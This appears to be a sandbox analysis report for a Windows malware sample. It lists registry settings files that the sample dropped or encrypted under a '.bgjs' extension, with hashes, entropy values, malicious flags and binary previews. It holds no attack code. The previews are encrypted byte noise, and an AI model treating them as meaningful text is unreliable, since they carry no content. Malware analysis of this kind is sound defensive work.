                                                                                                                                      Preview:regf.....s.1?..g.}..c.....C.j..i......h..8."..z.GH.....KF~.z..S.D..be.._<-........D.T.|X.,......".h..1....#.C.|..c%4...s...R|.d.eV`|3s..(..f..3...|.pX..:.#"q...-N.W...a.R..K.....s.."b]..M..=.k....&;.d..!.}..k.....|....+Y...n..l..........M.......6..8.....6J..E..E./>.CL;..:.:H"..C.q..b...+.-..Cb..z..h.6...W..|q&....a.FpG..0.@FM...,.g].-c).....d$..u...pgC....2".. .D.....{./.MKEB\.&.....Xt....i..I[0.uWe.G...Y(i.#....1i D.r.....zY.J.r:.....|s..p2..+@.32..:.S.4xx.....2.s.\2....'I...l[.......BO.Z|..7`jz......b.iC;W....1.$.[..T.+..wP..-jBno-\G..&....Z..[.].+.b....:.X.S.k.FC.Q....\....d......n.....<&.SB1....f.xN.U.@)..?.P@.B..._.w.0..N<z0yf..;.S..2.P5..rAW.]ak."QS.%%..?=.....g.GH..{...?..YB[...m.jf.....}...6Y.4V......&PV_....{........p. .# .Z,..'r..w......k."v.i.....Tgi_P..6..[..<...{.?..q.C.:Y.T1..ac......5.:.p;8O.:.=.x.0Z..H.(..e+gK..$.x..cd...i.<..i....7MO.\.?...Yn...$..r......C;..H.....$..WP...d.../@w."...S.~E..x.Lq..{.......L5danv.3.vM.......X)F8..

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.975291807809696
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:q7Xdcilkm0dlwPqYndf+ikdFyQby6pdzOr:q1GdlfY5SFLpc
                                                                                                                                      MD5:52ABDF1EB3C666A6BA9FECB5DECFE616
                                                                                                                                      SHA1:DD8589E4C8363EE5F5BEDDF44FB8B9E207A99985
                                                                                                                                      SHA-256:882FD79471D021978869BD88C68687C2329BF4CB6D9BE73272541153365F3D26
                                                                                                                                      SHA-512:D0261933BBD786F9B27F6A46394AE0AD518A5C58C173C7A99A77655616193BCE89BDA620F771CE2B10B9A2BEC04ACAFD2093586490497B3D17FE1D6F86605F31
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.j...$.WS......w_..@...g6I{(...LX....o...fF....t}..)......X..>...}.k_i.A..Ou..yUM...#FmR.&..C..Y.La.NoMXJ......j...pK.Q.j..n....#.*...g.,$Wq......Qn...c...Sk.....F7.a.3W...(.]...7.2@....w...O....T....@.NH.'...e.n.........|V..%dR..y@)V....8......PP.q.TZC..I...4..7W...L.Z...c.....a..@.2Zgpc..(:vK...Tq..~...Ii...~.\9...uS..k.`........Y.z...c_?.........X....Z....e>........R.gq..a......H..v..>.....<P...-^X.GF4p'...]......[.-...k.p*a..j%....v....j.......)..sA9......LM7m...0.d.v.rHi.. ?.......m...Q.>a]o66.bq..T...X.TH.0.7C.l..g..U!.f.t...N-.N!Fz..R....5K..^9..Y... .&/..].n....s..A.....]wi.Rc..(...]e..{q....r._t.m....9..d0...4.\.*:Ze.'....w...-..o.9m.Q...\..0f.:.L.o......u..*&.Ihh2...Iv.."(...@.}..P9..m..3.%.E..&....f....*. ./!.^.-h.,..gg.l.x.n..R.WP...H~.&..o~.J..5{........A(.o.I ..f........_bV.r6.h.?Rf...G..?....-...(...z..W..#.{...W.i.b.9.^....s.Px.\..S.G..+....<....3....zy.....w...........5....Pm....>....fN.@....)...|#.]...L%u...y......2q..ple^m4.

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.977110392785588
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Clee0+t25yiW59mZSYkZSRcoBkWA89giqJJuYkZgOQS7rso:yee0+t2259mZUUx58TOXv1
                                                                                                                                      MD5:28E5F259A8EE4C55D9DF70620E21AC60
                                                                                                                                      SHA1:5C8CCB0C057885C4ACCD0B0198C43D38997265AE
                                                                                                                                      SHA-256:3A95B9A1114850C18F53DC070DDECB502649FB5ED1F983E7C34E6E909BAC7D65
                                                                                                                                      SHA-512:0509061213382381642FDF4D04E9FF375B185EC1410D1CCDEC4A6B1EA2BE9B8DDE11A46B5CA283B8CE2290BFB00A5D5269D53E590D551B5470A04B52D7288AC0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf....._'..y...NSGcL...`....7\cO...M3.A.....R..j.p..5=U...U.........(.rN&..=l....a.....?..2...(...}.....:......P...k....ka....n....b...bk....i.).j.ap...`tt..dU.sU"9......Dkj....X,.<..T.....D..NBz'...s.5%.k.(.o.`.......s:..;.....<..c6.D.D.C....d.r.acz!.....}.4{..Kc.=.?T..Z............{.-.....G.r../...1f.....>)y.!...C.!.B_.F.V.^.d................M.........t...`..t..~.....].X.n#... 5W8......Qd.m..l...("Hm...*....sQ|.KS'G.P.n.3.x.)..nI{.d.@....._$....|....R>..j(.T..(...*B...U.*.p.UD.H8E...].g+.?.P.?.......b......,.....y.....,...6H0fX..h.&m...'M.S.eC,8...4PX~k!.$.....w.C=...F.#A.H^...u.*.uJ.O.o,...7..!...%.r.l.l..Hw..L.#.....].J.....d...M.n[W....5.......+..W....G.....(P..H......_...X ...0.h..75..._H.Z]`.._....0..f.+.w.ZK...."...F:......=..R..=...8)M...~.:.E.i.Wn.;.r..|.......-I.cO>.Z.OD.`...9..uus..eX.QU.Fd(..X.. .Q,....O...p.....#B!..7.g.F...4N.a.L ..Y....e.L.by.......3.Y.`2.q.f.y..A...0...e..O.i..D@P..5.....N.n........K.X.9..%.7.Y

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.9793764120438
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:DHPiPdmijS9MJCsrzvl7hULI1WISdfvtjN+Wwg1i2k/ya0Hm9Ab7GU:D6ArSksrzppAISdfljN+WwcwaZHm9DU
                                                                                                                                      MD5:900CFB3E7F1C66945ECEF4821105B04B
                                                                                                                                      SHA1:ED4DDE454423BF51D92FFC7800041F96F7687322
                                                                                                                                      SHA-256:0AABC100963412D047959F83FEA29F4A2BC77E0D6B46A0E2CF7250D6FB3A1D27
                                                                                                                                      SHA-512:BABDB163F67A6C8B56D0C307324210313DC62D9563C5EE0C077458A33AE0C2B743878CA22336368F003F7837D00501D8B90AE08A76A9EF96EC9FBA6205E0F8D6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf."..Pfv..<..x..C...f3X.hO..Lx+0K-....V..lz6...9s3.,.*Cv...M.}.r.V.X;oI.b}....~..>....<.$....O.5r{U........KA.H..+..o9.%.'../.]`.jOd...M..g.,5.p...qo..r..V.5..O.E..G.g+.f..P<JAO.5.3..f1&..p."b>..-:L.._O1..n.%..E..`z...`?.._...R.6..K...`.L......Y.L-..K......"............}..%.U...L.0*'.........`..g....`$.......?..h.#V.,.L.KG.X.).X...,P... 8S.x%.JN.d.....@.....I..);6K.._d.Q..y.\.C.ec....~+T.....2....$.j^..#4.F>....b.G.]?m.B"...pF.....^..:2.\....='...PS...].IB..Q.F......$U.#I..3.w..3.a;l...m..H.....YH.Rn#.t.k0fP...ROXD......z~J.].@]..g.`....}I.N.N.WR.v=...../...T..q/..Cm....tq!./.SEo.....3<..y.[.=..$..c..7..*s<.)-$...KR.f...K.o..t......e.H}..V..........I.....P._....(........_..4..(w.H..:+S.&z..P.# w..2.2.)q..mI...8.#...9?......&....l'..}.X..%V....5...a.4.c.]..0.]VI.7..B.A..l......^.#h(.6U..Bn....7.0.pR........ oo........j*G.Z..6bU[7....W..H.....5 ...f..9.*Y......0..(#p:..*.F2#.......R;.,[x*. .........zJa..A@....6....{....x...O.9n...*..;.....v..'.*

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.980309334729296
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:RTNtg2Q8T91kPLnyTYRct41GoIT6lrolnMb9S:RZtg2LkPLnrRiojrotaS
                                                                                                                                      MD5:BADEEB01FEABBF0D014B1C9CE0EA2273
                                                                                                                                      SHA1:3667EA6E2308A1FD96209E78807B98726FA24D36
                                                                                                                                      SHA-256:34319184767CB8BAAC73F05FF77EEE283C900CA9552B2E0BD23B0DB76CCC96AD
                                                                                                                                      SHA-512:F444ACB4C7B60EE142C878C71DE6B198148D23D3B023628D05B764B444879B838E7594FDAF59E864A8BDDE179B40675918A99346FB83AE5AEAECE507BF6784B2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf..R..{.....3......]^.+..9,._..U.pH.+s...s...=...^n". .w...=..t.%n.=.f.Z.T..~...F/.9..+...jH*. j7.@.....c..RBmFh...o....%AJ+.P..F~..S...............e.5......~.].....`...;...5Jv..A....Q......Y.'..+..i.|.V0.RFf_.f.#...a...1>.y.....J.c..w.......-Q..c....Z.*...;...l..^..c.._?SIq...x......^p........N.c..:.....^.fH..H.[............@.....|...R`r.w..GX....@..M7nv.*..vOC;. H.g.*....=5[?)]./..i$....E...I..o.=.0d..E.0F..0E....L..T.O...xvg..hJ..h.[..2....A;)....T.".5..M..\D...G..F..4.3A..Y..b.....p...,.=.V.e.-".&.?.=.J/]b.V..'i9....3Y..&...(bC..{n9..$7.\uu.r....wI..@.....+...`1...U.....#.....Gy.....j....~..i..78.{W..|h..{.1..l......T..o..0'.6....t...x.zR.V.>.ou:..h..F...Q....T...;...i..w..s....O.......,...f.Y..<.;T.:.d....Ej!+,..J.(..oF..y......No.....k.U....x.d.`...].."...|...s..r..{3..`R.S...jT.B....%....2.T........pr...O.....&?...wA..nLMe.sfC...I....X.5e....?.._...;.3.H.A..C5.Z..T....z.T.s.H.7...!.g......[..1x7T.{.....\.K.`......`'....

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.979143251356616
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:GXL/er4GiWC4DZ/pj7jw4EIjE0n2qgebO9xKUHd5skk3fUz:GXLlGiWJRHjxEIF2qgei90CckCfO
                                                                                                                                      MD5:BF77B35084B4F0B5AFE7F908C5B5F7E0
                                                                                                                                      SHA1:EE692BB26405C6E63540A222913196A6A4BF7474
                                                                                                                                      SHA-256:7170002DF234D536398DFFBC8BE4621CC5DF33B210DD042DF4FA6032A113B986
                                                                                                                                      SHA-512:094E002451641945A27F2FFF264D3A2775BB719C8FF5AA8E1615217666C014C7BF07CB2E325873FF5D254BC67AEDF36374C2A4BAAA361802C341BAC899300DF3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf...x.#.m.....n.L".{....?...&.....<.I..9..4.R.$.g....u.G..D....y..![$ .>.+~.r...2<G.p.;.=.3...x..(..8^g8.:..Y....f......%I.4..&Ph...!y7.L....B.m .!~...[.?.....0C..>..K.x.......{...0....5.Vt.#.....o....A.0.. .q....(......c.Fv.X.<...../....v.....o.....D....\X..H`...\\.#[.%Q..<.=..`.BR...;..v.^p..YC]..Ln..dsh.d.b..]..K^..XiT..o....y1.c.6.;"gp.a)..Z..v.h.p........3(._.k..E..rY.....}...*.6.u.X...M2b.R.W.?...g..ME(Ld...c.&..0..}|+?CL...8...\OQOm.....uo..7$.x.......)#..f.L.<zY.7>...(..!<....;e..U.#m.n..6...5@.Q....J....]._...E.T.....I.=.H_....-.x.='.._......A.R..\.l..Ae.....h.e..~.L`.A...x.).>........$+.FE.Pr.....Y....G`.EjjJ.{.G,.-..."f...z_H23uC......9.......=!.... [.mTv.%.I.i\\.5A%...q...D...........b}.9W.....+..&.(.x+u.u>..0..l.9.....t..0.....C.%........a..1....}.;....Va..S....O.:S.|..$ ...d....1..%.N....V...|Pd....S9\......A....Cu..3=._..j%g..&.. ./.4.J[.x.}]...^.....cJ|>r.}K90....H..5.h0..)N...;jB_.m....}.WF./RP.\...t3bE.6.....J..

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.974591759950497
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:pZIsZ5g/0NSkdHT/KwH4iqGqTkeM+MvUk614u2/UW8:pC0XRtH4iEvcz614ZS
                                                                                                                                      MD5:536E78F819E9C3FCD8BAC88EF5B29165
                                                                                                                                      SHA1:9F8B1C230CD127C452F54C27055326ECD41DB9A6
                                                                                                                                      SHA-256:D831BB6B38229BE39255DBFA0382C0B062C49BA238C9C9143F00B0E66CAB1A72
                                                                                                                                      SHA-512:2DBC5DFECC0D063A6610F622B44ED959899EDF489BAB1F53AA749EA345F2382037FB251027868DA0CBBE27583957E73D6C911E9B8829EECA0D19424DB13CBDDD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf..g..%.mn......_.............4N.6.;K...IOJl$..d..H...b..'.UCe6.q......AcH..b....p.3\...h..v=R.".'.K.Sp..E*.9..j.i...*..B.....>.d.S_.@t....v......&......<..M.v*e=..QD...{.]?X0...`.E.um)..*.MBJ.<...Q..@X...8.h..l.o<.H..M....j.....5u....=.3.v.X,.vi..H._^t........~..$..m...vnSPOg..+.....s.....H-..#......:I.qh..w..F.m...J>.....A%8....}a^....-....*[.-...\6!.Y..h..k$D.}.v....".Y..y.......m.].6..h..*..P.Hx-P~..}v. ]....Y.......Ty6..#5=!....wO.a.%OjGHZ56..9.w^.w4.5'D..7*..57.W.=E.w.P..z..]^c..{.!.W.......U.BXv..B..T...UH.?Y......k].K..Z..9.,F......1}.3.mq".XA...8..nh.a{+.}..@j...\k.......o{..:0..5.....9....._....&|..S4F....E.#..'.!..Z..j.;>D.N8................GJ........a....!(......0.<.^E........M.....< *M`V...0...nJ.`..M..u.9^kR.(..?.5.I*.l5{....>kj..i....Mk......Y..Tg...F.q@2?....6...V =..=s.....!..P....w-....d........e?@.O..>....W..).b.~JK6.......`..-..=<.l..r....n....')..........Nx...f.x..`..9...3..@..<z..Y...............%H-\.A."<(..n.....+...

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.977644709609756
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:vpccMbdu7DRvn1/T8bNznw/dzjjmmbxoU/jKWBHjcjSaaedZc/l:vO3bE7Dl1/T8lgjmQ1+WBDcjHaera
                                                                                                                                      MD5:BA402898A8D75AABCB28D43902D770CD
                                                                                                                                      SHA1:31A8C0C03C89112CAB9A03FB093F6D6BC405BB8A
                                                                                                                                      SHA-256:39A898232850848952B53F26B72BAA0FFCE9CAB16BAF3C38A3E82199876431D5
                                                                                                                                      SHA-512:9E8399FE93F0DDE14343F905F0663B98A7DC76090C2B57238ADC072E0FB7AC8989A969759346617C989D4A234B162644C116D47625C7D61D152173BC24FAD63A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.n..ZA`......Z.LJ.N.....^...b.j..{....r0....AX.}..<_....Sl.FVT...K'...k*6y.\...._....p.~97>.P.B*_..O8...|......]+oO...8^.}..0.G..S..o*.!8LWdii...u....*.lT..K..T._...E.#..J..Igaw...tMq.....'e.?..&yW'<./...2g...C)G.?L.j?0.....h|......\..=-..F...4.../...._.. GV.i.).......9.....`.&D.........t..=D#-qc.n....^rd*J0fE.Rn..:.:3....~.R..G:.K.%........t.-....aX8. ...Z...k.Z.7..._.0...(.,....W.S.$.. ..n..y}7.A;V{...@lN0.:AXo..;.......ao..RJ..4y..v.`H-V...3K...O...Be..a...=...5uIUk.bHs.(..N.zr,@.m..o../.x0....e.....`.I...<.....+;.......$K.....^P.X....~.nf.4.4.........p......S...%y..Z.3>...A.*m#........]..p....S.KUvy.*..oF&G.`.....[......!j...Lc"..2.." .A...c.nL.....dhKh..ag..\".....I.]3.8..pII.P.p............\........]h.3H.I....O.......%....@YI....5Bv..].j{r.L.my..R.=..R.4......}.%.../F......\;{0..u.Y.`...0..dy..F$...r...p..6=`g.......sl.a..St.E...........*5..{.@A.I..%...H.O-n.zm....&...+..#...}.HJ.).;Yjr@.m...dA....E....-...N...^'.w

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.978183388455563
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:VOpkiS0lWghDHJZa1SxkAQEtFbb8307uWBL0c1P0T:kpPvlt1va1Smg3boMZBL1sT
                                                                                                                                      MD5:A15896A79F6BE23657C1B178B8A4E862
                                                                                                                                      SHA1:3036236EF137586F2735B5E5A1EA78F7B5F9F85C
                                                                                                                                      SHA-256:2A314D7E10E99DE24B776DF976AC0BC4B27FE1EB8D697A09E83D12C786E21CEA
                                                                                                                                      SHA-512:B581882C018B37F8DBCC773AD4569C67261E12BAE0FEE62CE1B384F560766E78AFB31D01C5CEF9E9290475DEE031DFE85149C658C22C1FD23645F346F64F3DB3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf..E?.h...Ml..P.o...4l.... ,.?DY'.....3..<...:...gq....+[.'...x.....~..=...uh.........g.=.z..n./.%.!M./..~!..N.3a.~.Xi...dqR-\.x^].y^&6o?...s.E..#7...S..^.A9."p."...Yb..n.e...........:T\.{*C...=.?[F.2v......y..p...~.......7xG#..yqs............P.Am...#.Y.#...s.q......_hitoI$6..8.>..\U........8....u.....t[....K.....5..Y..B.\..E.._../.Y<.L......_...^I..84..mjXTQg..m.$..D.).Imw......-34..y2....E.G]FU...*.P.p$.a.^H....H..z6.c..=..%4....g......P....nnd....U.6.YL..\N..........;HF3....8.v.'g..xn...=.....}.=.Qu..T.C~X...CZ..E.0...Ya~".....I.h9.ql.2.l%......a.O..$@.~`.._..a....O...\.|.!dL.@h..[...."b..8^!...8b.2..-..}F.....Ns.I.y.v.jM.ia3..6.k.S.__.X..6zz.4?...7i...g.V.<9.......0_...H.}.P..m..pQ..L. ...,*..f...Ag.pE.y+...P!.Y.r.{.-2.q.B.W+e.M...m.].T.R.......#.....3...P....C....b.J.@....l...G&...D.9....;.z.z...V.....P.C..a..;.^.1.~#bu.....O.|.pX....o...z#m...u..RW..Q).-.e"gz.(.....X.^..^S...;u.N..:6.........A\.......g'.}I.=.)....d.I......o

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG1.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):82254
                                                                                                                                      Entropy (8bit):7.997863066122063
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:dv32iEG9QbZexcewfVY+Pb+X5HlDZ7l5zVR/KIqZIfKUNfjxG:LpQbIpwfxPb+X5FDZBBjKIq6hNfjxG
                                                                                                                                      MD5:06A0EA702E39CE829EA2B0669C0F676A
                                                                                                                                      SHA1:72B01C75E46A57C068147C9CDE5AF6FD166E9067
                                                                                                                                      SHA-256:4B95ADE7BEC8693A25B5110FD3D5135FE4556E1951701D70C8F5E46808AC8693
                                                                                                                                      SHA-512:B49E0485B98F7EE35519A4982BA917F5A95AA0E9584F0502EA281509DFBC73F3481099FC3F1B13903871BE074B20B220522709EE3A8E1634BD391036EB03DB44
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:regf..U.[...."..W.f^?A..n:.D........h.}Z..X.c.........`!d.....0V..J...V.....S..f.j.$.*0.>...0...=V......Y0.Dsh.A.....#..c.H...1A....A..j!....>..P.'...H.VY.:4Gm.q<..)..O{...I.`<.Gw.....s...Kq}.S...5..."h.}\....c..4..{..:.....=....O..I..X...#q..F....).@R&u..z...n...1... .H.......t.$..Vi.?..M".l,..^...f...W...&j.BT.[D..*.[A..x..x..w.8.Q..g.A[.7...xk.+{.....|..;.|..V@H"=$o...p.....G..z.Sx.[..6...D.i.Q............?.L..z.P.(..r9.h y.R...X.....^...t.3.Xj....B...|.{..J'e...r.:.......X.DF5...U....o.6...Ff.cY.89*.{.~.I.....I..9nI..s....|..j...i........l.k....G........<.-Qhi~..Z.`9.v.y^_S0.......U...I...x.qD.......5.A..(.$..f#..q...Y..1.{..\FWk.Q..ibj..........f<k_..+..c..xK_...Y.Z....h..K...`#..n>.s.!{...{MR.g.U.@0.1.u.....o..N...[J...DN.`..<..V..-g.....S..>"C..J_.s6..c.].M......B.D..&..|...wGN.S.2...Y .\.._........r..Q...w..N......-.w.s/j'6..L......>.sZ:.4..`.$.L0o.s&..T.=Kh...z..FE.....X^..!...~....t.9.'.;c:...Ww..P........)....#S.^.8..v.)]

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG2.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):41294
                                                                                                                                      Entropy (8bit):7.995823784027173
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:vHpAduJPz+Dm5bGyO/QZv38GygqZma5fSQIRSThHeQ/nQld8JJW8nQbrcS4PHFri:5aD/ydvByEgzIEThHeQfQEjjSqHmfr
                                                                                                                                      MD5:533EE67AA5DAC0CDE194E73EE717A7DF
                                                                                                                                      SHA1:2339513894DC83D11016F59DB28F50E465694B64
                                                                                                                                      SHA-256:E4A8664A0EC9041B4CAC71DA30DC9375862DBA683561D005750079AB48DEA87D
                                                                                                                                      SHA-512:3AD7B9AE19BC90808944C0E304F54659917575FE03AD498088A9B2D3B85104927990ED6B5E768744AEFCB4EC08D7E62191288882E1ECCD41C0D324F531CF6BC4
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:regf....'...p+_.~.../.Dv[..._...L....e.-v.........!..76.i.S,...;).Jr...Gf........F.m|..7=]a.,...........b.....=G.-^..NE.T..>d|nTr.c <T. ,..m....g..jt..[.z6s._b..Y.HT..7D6A....X......~..-...A..l.....[..4.}c. v.tU.]/...u..[.6~.d]....;y....na.....>..6W.^T...H5n..i..?...D...H7...;.6.....U^......._R....^R..F-y.{.I.H.x.a...3..0...a.1.W9.r=.9r.E{6.t.;G..L).>..2jm.'u>.1..E..K...D.....l.w. .......!.....w( ..V*^."O.9..on...5......!6N.....}.....].I...FpoJ(.O.pQ...._o....".I...+...G..._=.4.4ty...k.olE.[./n....."a.<.gD.........R................<./U.....[.=.rv..|:!.S..i...*.>..*"q.V).....V............P..m......%...h$7I.i....~...O....#pB...`Q...^..i+L&.....q...T.%'s..o.M7.\./.....H.......}.2Ov.Z.".!.....a..e.N.;%^.U<.//.Ly<....c...6P.z..;4..\@..."..H...pa.g....#8.*.....}!m#+\...:a>.7^.H.J,..;..+....b..8V.>..Y.\M........J...Y........V.+.".$Df..`..d..?.F....._..ga.B|.....-...O..*;...c0. .@g..#.J...G..e..c..:gS.AY_...@.LY..~.......s....2..b@2.<S.NB6.

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):131406
                                                                                                                                      Entropy (8bit):7.99853707186619
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:3072:9AjOjGC/7T4PvE+WIyWb18yH+Z5tdYvpm0mQBzI:9+nC/7T4E6yCiyH+fCzI
                                                                                                                                      MD5:55C5233BAA0B4794D838D365EB48549E
                                                                                                                                      SHA1:2CCBCD3833ACA132ED0557950301811F678A58E0
                                                                                                                                      SHA-256:D55820285755630D061DC9651E3F85267505B8D4D5C13CC30037A13BBFBB680F
                                                                                                                                      SHA-512:CDBD172A030D62557991A79D2EDEABF0030D7853223C7F18A666B6BF1FBB0B0C0B8A9938B774E1FE3648ED6FF56352A24DC3D9998799BEEC594C1DC53F60BB10
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:regf.^..d.........~.n....(.:..\!..j.o....9E.T.......(.<@......IX......K...3d{....A.O`....5...l...r?.1.......Q.{...l.).b..)a.;..,#.g......9r?..79.6.Z.CuC..R.Z.-.Hk@..1.. I...n...m..E........=x..:Y.....U...-.znK.c...V...K*t&..`...63.?i.o..W..R*.d.p1...N.....jv.x.g]...O...&&...w....vp~.r<..b.Zw$RN..s.QFH:@.G.a..D4...H...XDZ.N......l..j......@R..c.s0.......GM.....[c.8...R(.f.vFi..H...d....[sO.f<..l7.8.,.f.h]..=o}b..L..=..Pb.....{Q;|.K......Z>...0..h..q..0.)d.....t......:i.c.......u.e<..Y..q....Y.!.,;..~.!`.:...v(}.#......g...*.#..v.phB..I]O.B.4..U.....8>.E..}H....d..p...B..|$Vz...."s.*<$4.Ek...Q....<.>{o..8.......i.....9....Z{.....;Ra..LZ.&....o.k.#:.^ .L.s.TV.v........../=.. F..R.y..\..o...|.-s>3U...OB..L.x.0..W.......'...bF..C}..a...:.\....p4.1.....6.X..I..#..F;..C.a..I.y...69.rdz}.B.......b....u,.F.T.....Z..}E.Y....,.D...Z.4&7]b...8m....r.0...-4.....=......P.\...nE./..L.<.E.D...SF.R.[E.14=..xg.1B.Z.@$9.A.[.:T..0..*...=..~.a.._EY.Z.N.5.#2.....B@

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.974167615650112
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:lu+ui1XPsJDPc7UUGFt1KIP9un7RbFWfgoyggiub94hYv1bTgnxdaAgEzIy:lB7xPsJDPcUt1xmbofvSp4hI1b2Lhg/y
                                                                                                                                      MD5:485D23AD9BB63174ADDDA028FF7404F5
                                                                                                                                      SHA1:BBA86CDEF87186C593930F7967BCBEE1704A3354
                                                                                                                                      SHA-256:2A0AD0A5FBCD4B37BFC606FF56EA045AF16BA74BD69CC2C5919930D575CC51B2
                                                                                                                                      SHA-512:6FA470945C59EB047EB51FF87C998C0006B9C6E8261230DB616C526B54F35B8810BEFD0F4FD3858D4465BE147FAAA94E335B583BE2DDC27DC58D02075DF8A942
                                                                                                                                      Malicious:false
